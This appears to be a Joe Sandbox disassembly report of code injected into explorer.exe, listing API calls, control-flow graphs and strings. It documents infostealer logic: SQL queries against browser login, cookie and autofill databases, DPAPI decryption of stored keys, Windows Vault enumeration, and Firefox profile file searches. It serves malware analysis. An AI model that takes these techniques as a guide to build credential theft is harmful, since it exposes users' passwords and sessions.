                                                                          • Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
                                                                          • Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 00E03778
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00E03782
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 00E03789
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00E03794
                                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 00E0383B
                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 00E03870
                                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 00E0398B
                                                                        • lstrlen.KERNEL32(00000000), ref: 00E0399A
                                                                        • wsprintfA.USER32 ref: 00E039F1
                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00E039FD
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 00E03A21
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E03A49
                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00E03B13
                                                                        • lstrlen.KERNEL32(00000000), ref: 00E03B22
                                                                        • wsprintfA.USER32 ref: 00E03B79
                                                                        • lstrlen.KERNEL32(00000000), ref: 00E03B85
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 00E03BA9
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00E03BDA
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E03C16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                        • API String ID: 584740257-404540950
                                                                        • Opcode ID: 078be1d4740e2c13140fb6c8c6879adb74d550a0e78f40cba97e28b632ca7038
                                                                        • Instruction ID: 70d0204c2b64da56b3ffabedae1c7e040bb7d5c328dac8558bb2456a90662149
                                                                        • Opcode Fuzzy Hash: 078be1d4740e2c13140fb6c8c6879adb74d550a0e78f40cba97e28b632ca7038
                                                                        • Instruction Fuzzy Hash: CEE1A970208341AFD725DF65C880A2FBBE9AFC4349F44592CF985AB291DB75CD88CB52

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 134 e02198-e021c9 RtlZeroMemory GetVersionExW 135 e021d7-e021dc 134->135 136 e021cb-e021d0 134->136 138 e021de 135->138 139 e021e3-e021f6 LoadLibraryW 135->139 137 e021d2 136->137 136->138 137->135 138->139 140 e0249b-e024a3 139->140 141 e021fc-e0223e GetProcAddress * 5 139->141 142 e02492-e0249a FreeLibrary 141->142 143 e02244-e0224a 141->143 142->140 143->142 144 e02250-e02252 143->144 144->142 145 e02258-e0225a 144->145 145->142 146 e02260-e02265 145->146 146->142 147 e0226b-e02277 146->147 148 e0227e-e02280 147->148 148->142 149 e02286-e022a5 148->149 151 e0248b-e0248f 149->151 152 e022ab-e022b3 149->152 151->142 153 e02483 152->153 154 e022b9-e022c5 152->154 153->151 155 e022c9-e022db 154->155 156 e022e1-e022f1 RtlCompareMemory 155->156 157 e02365-e02375 RtlCompareMemory 155->157 158 e02452-e02475 156->158 160 e022f7-e02348 call e01953 * 3 156->160 157->158 159 e0237b-e023c9 call e01953 * 3 157->159 158->155 162 e0247b-e0247f 158->162 176 e023e4-e023ea 159->176 177 e023cb-e023dc call e01953 159->177 160->176 178 e0234e-e02363 call e01953 160->178 162->153 181 e02431-e02433 176->181 182 e023ec-e023ee 176->182 190 e023e0 177->190 178->190 184 e02435-e02437 call e01011 181->184 185 e0243c-e0243e 181->185 187 e023f0-e023f2 182->187 188 e0242a-e0242c call e01011 182->188 184->185 192 e02440-e02442 call e01011 185->192 193 e02447-e02449 185->193 187->188 194 e023f4-e023f6 187->194 188->181 190->176 192->193 193->158 197 e0244b-e0244d call e01011 193->197 194->188 196 e023f8-e02406 StrStrIW 194->196 199 e02426 196->199 200 e02408-e02421 call e017c0 * 3 196->200 197->158 199->188 200->199
                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 00E021AF
                                                                        • GetVersionExW.KERNEL32(?), ref: 00E021BE
                                                                        • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 00E021E8
                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 00E0220A
                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00E02214
                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00E02220
                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00E0222A
                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00E02236
                                                                        • RtlCompareMemory.NTDLL(?,00E61110,00000010), ref: 00E022E8
                                                                        • RtlCompareMemory.NTDLL(?,00E61110,00000010), ref: 00E0236C
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994
                                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00E023FE
                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 00E02493
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                        • API String ID: 2583887280-2831467701
                                                                        • Opcode ID: d3f67fcc712dbd1fb929e38760b290e6377181451d6daf7156f995cb6e2bebcf
                                                                        • Instruction ID: cca095203c6abde567d9e4e5e5bdc11d4a3c6602f228f8dee4f46ab9ef349a78
                                                                        • Opcode Fuzzy Hash: d3f67fcc712dbd1fb929e38760b290e6377181451d6daf7156f995cb6e2bebcf
                                                                        • Instruction Fuzzy Hash: 8791AF71A083019FD718DF61C888A2FBBE5BFD8748F40582DFA95A7291DB70D885CB42

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 e03098-e030b1 call e01b6a 264 e030b7-e030cd 261->264 265 e033ba-e033c0 261->265 266 e030e3-e03128 call e01000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call e54bec 264->266 267 e030cf-e030d8 call e0302d 264->267 274 e0339b-e033a4 DeleteFileW call e01011 266->274 275 e0312e-e03146 call e3eeb8 266->275 270 e030dd-e030df 267->270 270->266 278 e033a9-e033ab 274->278 281 e03392-e03396 call e53848 275->281 282 e0314c-e03158 call e202ec 275->282 278->265 280 e033ad-e033b5 call e02ffa 278->280 280->265 281->274 287 e03389-e0338d call e1fb92 282->287 288 e0315e-e03161 282->288 287->281 289 e03165-e0317f call e01fa7 288->289 293 e03185-e03196 289->293 294 e0336f-e0337b call e202ec 289->294 295 e0319c-e031ac RtlCompareMemory 293->295 296 e032cd-e032e7 CryptUnprotectData 293->296 294->289 303 e03381-e03385 294->303 295->296 299 e031b2-e031b4 295->299 296->294 298 e032ed-e032f2 296->298 298->294 301 e032f4-e0330a call e01fa7 298->301 299->296 302 e031ba-e031bf 299->302 308 e03318-e0332f call e01fa7 301->308 309 e0330c-e03312 301->309 302->296 305 e031c5-e031ca 302->305 303->287 305->296 307 e031d0-e03253 RtlZeroMemory call e01000 305->307 321 e03255-e0326b call e01fa7 307->321 322 e032bd 307->322 315 e03331-e03337 308->315 316 e0333d-e03343 308->316 309->308 311 e03314 309->311 311->308 315->316 320 e03339 315->320 318 e03351-e0336a call e01798 * 3 316->318 319 e03345-e0334b 316->319 318->294 319->318 325 e0334d 319->325 320->316 330 e03279-e0328e call e01fa7 321->330 331 e0326d-e03273 321->331 324 e032c1-e032c8 call e01011 322->324 324->294 325->318 339 e03290-e03296 330->339 340 e0329c-e032bb call e01798 * 3 330->340 331->330 334 e03275 331->334 334->330 339->340 341 e03298 339->341 340->324 341->340
                                                                        APIs
                                                                          • Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
                                                                          • Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 00E030F9
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00E03103
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 00E0310A
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00E03115
                                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 00E031A4
                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 00E031D7
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E032DF
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E0339C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                        • API String ID: 2757140130-4052020286
                                                                        • Opcode ID: 59ac720a3b7826b659308effb772f5863e618dfe159bf14b6dcdf19e2e1a6af7
                                                                        • Instruction ID: c9d402778daedb4cae8846179da38a2360434af3ad532030c3f54b599ac3ce29
                                                                        • Opcode Fuzzy Hash: 59ac720a3b7826b659308effb772f5863e618dfe159bf14b6dcdf19e2e1a6af7
                                                                        • Instruction Fuzzy Hash: E791A971208341AFD7109F25C884A2FBBEDAFC5748F04592DF985A72A1DB34DE88CB12

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 413 e03ed9-e03ee7 414 e03fd1-e03fdb 413->414 415 e03eed-e03ef1 413->415 415->414 416 e03ef7-e03f21 call e01000 PathCombineW FindFirstFileW 415->416 419 e03f27-e03f30 416->419 420 e03fca-e03fcc call e01011 416->420 421 e03f32-e03f40 lstrcmpiW 419->421 422 e03f78-e03f86 lstrcmpiW 419->422 420->414 425 e03faf-e03fbd FindNextFileW 421->425 426 e03f42-e03f54 lstrcmpiW 421->426 424 e03f88-e03fa3 call e01000 PathCombineW call e03e04 422->424 422->425 435 e03fa8-e03faa call e01011 424->435 425->419 428 e03fc3-e03fc4 FindClose 425->428 426->425 429 e03f56-e03f76 call e01000 PathCombineW call e03ed9 426->429 428->420 429->435 435->425
                                                                        APIs
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00E03F0A
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00E03F16
                                                                        • lstrcmpiW.KERNEL32(?,00E562CC), ref: 00E03F38
                                                                        • lstrcmpiW.KERNEL32(?,00E562D0), ref: 00E03F4C
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00E03F69
                                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 00E03F7E
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00E03F9B
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E03FB5
                                                                        • FindClose.KERNELBASE(00000000), ref: 00E03FC4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                        • String ID: *.*$Local State
                                                                        • API String ID: 3923353463-3324723383
                                                                        • Opcode ID: d763306538bee720cbf6f5ee85636fe27a911d3b655d82e975f38db9e0938bf3
                                                                        • Instruction ID: 00ae2a1e6bc984132f3a77c9da1c017dccebb480dfbdebf833a5d5b3c7f5e747
                                                                        • Opcode Fuzzy Hash: d763306538bee720cbf6f5ee85636fe27a911d3b655d82e975f38db9e0938bf3
                                                                        • Instruction Fuzzy Hash: 9821D0303007056FD724BB718C08ABB76BC9B81346F842929F952F71E2EB78898C8661

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 438 e02b15-e02b48 call e01953 FindFirstFileW 442 e02c5c-e02c74 call e01011 * 2 438->442 443 e02b4e 438->443 444 e02b52-e02b57 443->444 446 e02bc8-e02bef call e01953 call e0199d StrStrIW 444->446 447 e02b59-e02b6b lstrcmpiW 444->447 461 e02c10-e02c1e StrStrIW 446->461 462 e02bf1-e02bfa call e01cf7 446->462 451 e02b71-e02b83 lstrcmpiW 447->451 452 e02c3d-e02c4b FindNextFileW 447->452 451->452 455 e02b89-e02b94 call e019b4 451->455 452->444 456 e02c51-e02c58 FindClose 452->456 463 e02b96-e02b9b 455->463 464 e02b9d 455->464 456->442 466 e02c20-e02c29 call e01cf7 461->466 467 e02c36-e02c38 call e01011 461->467 462->461 473 e02bfc-e02c0b call e0278e 462->473 465 e02b9f-e02bc3 call e01953 call e0199d call e02ae9 call e01011 463->465 464->465 465->446 466->467 478 e02c2b-e02c31 call e0287d 466->478 467->452 473->461 478->467
                                                                        APIs
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00E02B3D
                                                                        • lstrcmpiW.KERNEL32(?,00E562CC), ref: 00E02B63
                                                                        • lstrcmpiW.KERNEL32(?,00E562D0), ref: 00E02B7B
                                                                          • Part of subcall function 00E019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E019C4
                                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00E02BE7
                                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00E02C16
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E02C43
                                                                        • FindClose.KERNELBASE(00000000), ref: 00E02C52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                                        • API String ID: 1108783765-3717368146
                                                                        • Opcode ID: 25da3f4166c9b78c65012149a15666a863ea92baa61e5ea1e6703c28d9a0e610
                                                                        • Instruction ID: 5b68d2055e4e24be3ac98038fc82cd06ce522e06efed5caf6044a9bc94548e34
                                                                        • Opcode Fuzzy Hash: 25da3f4166c9b78c65012149a15666a863ea92baa61e5ea1e6703c28d9a0e610
                                                                        • Instruction Fuzzy Hash: 2131B2303043014BDB18AB318899A3E73DAABC4305F846D2CBA46F72C2EB78CD899651

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 531 e01d4a-e01d5c 532 e01d62-e01d66 531->532 533 e01eb4-e01ebe 531->533 532->533 534 e01d6c-e01d77 call e019b4 532->534 537 e01d79-e01d89 call e01953 534->537 538 e01d8b-e01d97 call e01953 534->538 543 e01d9b-e01d9d 537->543 538->543 543->533 544 e01da3-e01db4 FindFirstFileW 543->544 545 e01dba 544->545 546 e01ead-e01eaf call e01011 544->546 548 e01dbe-e01dc3 545->548 546->533 549 e01dc5-e01dd7 lstrcmpiW 548->549 550 e01e3d-e01e6a call e01953 call e0199d lstrcmpiW 548->550 552 e01ddd-e01def lstrcmpiW 549->552 553 e01e8e-e01e9c FindNextFileW 549->553 561 e01e87-e01e89 call e01011 550->561 562 e01e6c-e01e75 call e01cf7 550->562 552->553 556 e01df5-e01e00 call e019b4 552->556 553->548 554 e01ea2-e01ea9 FindClose 553->554 554->546 563 e01e02-e01e07 556->563 564 e01e09 556->564 561->553 562->561 571 e01e77-e01e7f 562->571 567 e01e0b-e01e3b call e01953 call e0199d call e01d4a 563->567 564->567 567->561 571->561
                                                                        APIs
                                                                          • Part of subcall function 00E019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E019C4
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00E01DA9
                                                                        • lstrcmpiW.KERNEL32(?,00E562CC), ref: 00E01DCF
                                                                        • lstrcmpiW.KERNEL32(?,00E562D0), ref: 00E01DE7
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E01E62
                                                                          • Part of subcall function 00E01CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02C27), ref: 00E01D02
                                                                          • Part of subcall function 00E01CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00E01D0D
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E01E94
                                                                        • FindClose.KERNELBASE(00000000), ref: 00E01EA3
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                        • String ID: *.*$\*.*
                                                                        • API String ID: 232625764-1692270452
                                                                        • Opcode ID: 0741f9eb837e5c274ec876aa900853048c48e4850fd87095ae18a8ef3ed64b65
                                                                        • Instruction ID: 0f3e459cb9bb3adc064a69591a0b51a37c48651b67b0fb4e97d0e9c5ce2c99a0
                                                                        • Opcode Fuzzy Hash: 0741f9eb837e5c274ec876aa900853048c48e4850fd87095ae18a8ef3ed64b65
                                                                        • Instruction Fuzzy Hash: 4031B9303043415BCB24AB74C898A6F76E9AFC4345F406969FD4ABB2D1EB75CC8A8752

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 689 e03e04-e03e11 call e01b6a 692 e03ed4-e03ed8 689->692 693 e03e17-e03e22 call e01c31 689->693 693->692 696 e03e28-e03e34 call e02fb1 693->696 699 e03ec8-e03ecc 696->699 700 e03e3a-e03e4f call e0123b 696->700 699->692 703 e03ec0-e03ec7 call e01011 700->703 704 e03e51-e03e58 700->704 703->699 705 e03e5a-e03e6a 704->705 706 e03ebf 704->706 708 e03eb8-e03eba call e01011 705->708 709 e03e6c-e03e7c RtlCompareMemory 705->709 706->703 708->706 709->708 711 e03e7e-e03ea6 CryptUnprotectData 709->711 711->708 713 e03ea8-e03ead 711->713 713->708 714 e03eaf-e03eb3 713->714 714->708
                                                                        APIs
                                                                          • Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
                                                                          • Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F
                                                                          • Part of subcall function 00E01C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00E03E1E,00000000,?,00E03FA8), ref: 00E01C46
                                                                          • Part of subcall function 00E01C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00E03FA8), ref: 00E01C56
                                                                          • Part of subcall function 00E01C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00E03FA8), ref: 00E01C76
                                                                          • Part of subcall function 00E01C31: CloseHandle.KERNEL32(00000000,?,00E03FA8), ref: 00E01C91
                                                                          • Part of subcall function 00E02FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00E03E30,00000000,00000000,?,00E03FA8), ref: 00E02FC1
                                                                          • Part of subcall function 00E02FB1: lstrlen.KERNEL32("encrypted_key":",?,00E03FA8), ref: 00E02FCE
                                                                          • Part of subcall function 00E02FB1: StrStrIA.SHLWAPI("encrypted_key":",00E5692C,?,00E03FA8), ref: 00E02FDD
                                                                          • Part of subcall function 00E0123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00E03E4B,00000000), ref: 00E0124A
                                                                          • Part of subcall function 00E0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E01268
                                                                          • Part of subcall function 00E0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E01295
                                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00E03E74
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E03E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                        • String ID: $DPAP$DPAP$IDPAP
                                                                        • API String ID: 3076719866-957854035
                                                                        • Opcode ID: c9043e2471e48d216c57ae2d2b0655f0741ec5dbc8385e533871afc1c2b50d6e
                                                                        • Instruction ID: c9f18f94d8410dde2daebd32d22ae51e5f4445074e7bf4c16798bbf7265f42b3
                                                                        • Opcode Fuzzy Hash: c9043e2471e48d216c57ae2d2b0655f0741ec5dbc8385e533871afc1c2b50d6e
                                                                        • Instruction Fuzzy Hash: 2B21D4326043455BD711EA74CC80A7FB2DCAF84704F441A6EF940E7281EB74CE8A8792
                                                                        APIs
                                                                          • Part of subcall function 00E01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00E0116F
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00E04BB6
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00E04BBF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                        • String ID:
                                                                        • API String ID: 1675517319-0
                                                                        • Opcode ID: 2cb8a80f2d07fdb545cf57b59fa2c1ce11dc33f5a4c6b3478f44339c56a547d4
                                                                        • Instruction ID: 626d1cc3526c61e0190d8db04b9ca08ea3b8423238fa977c99317638cfb4f905
                                                                        • Opcode Fuzzy Hash: 2cb8a80f2d07fdb545cf57b59fa2c1ce11dc33f5a4c6b3478f44339c56a547d4
                                                                        • Instruction Fuzzy Hash: 06E0D8B15013106BC6587B71BD0DB4B3BD89F913A1F10D998F355B60D1CA31CCC48A50
                                                                        APIs
                                                                        • GetSystemInfo.KERNELBASE(00E620A4,00000001,00000000,0000000A,00E53127,00E028DA,00000000,?), ref: 00E0BFFC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem
                                                                        • String ID:
                                                                        • API String ID: 31276548-0
                                                                        • Opcode ID: 7e75b792f716d75c72ea66e3272f0e2b6737ac25315a93e67fa1b0c50115cd7c
                                                                        • Instruction ID: d2db02693f5c88a4434a0acb79c4cbb39010292c3a89b1511e410759252fda39
                                                                        • Opcode Fuzzy Hash: 7e75b792f716d75c72ea66e3272f0e2b6737ac25315a93e67fa1b0c50115cd7c
                                                                        • Instruction Fuzzy Hash: 33E0E5317C430035E62536B97C07F5A15A58F81B81F64BA55BB10F91CADB9581E02026

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
                                                                          • Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 00E03C6A
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00E03C76
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 00E03C7D
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00E03C89
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00E03D2F
                                                                        • lstrlen.KERNEL32(00000000), ref: 00E03D36
                                                                        • wsprintfA.USER32 ref: 00E03D55
                                                                        • lstrlen.KERNEL32(00000000), ref: 00E03D61
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 00E03D89
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00E03DB2
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E03DED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                        • API String ID: 2923052733-3488123210
                                                                        • Opcode ID: e172b68634998a7bb554417dd06f3a9df3906aa1e6114af026c9998f717e0c1e
                                                                        • Instruction ID: f4b9bff1ca902aae0378fd5be93eed28de45b1daeb44fca9ef1874e90d279f2d
                                                                        • Opcode Fuzzy Hash: e172b68634998a7bb554417dd06f3a9df3906aa1e6114af026c9998f717e0c1e
                                                                        • Instruction Fuzzy Hash: 7341BF30204301AFD725AB718C81E3F7AEEAF85759F40286DF885B72D2DA35DD858762

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
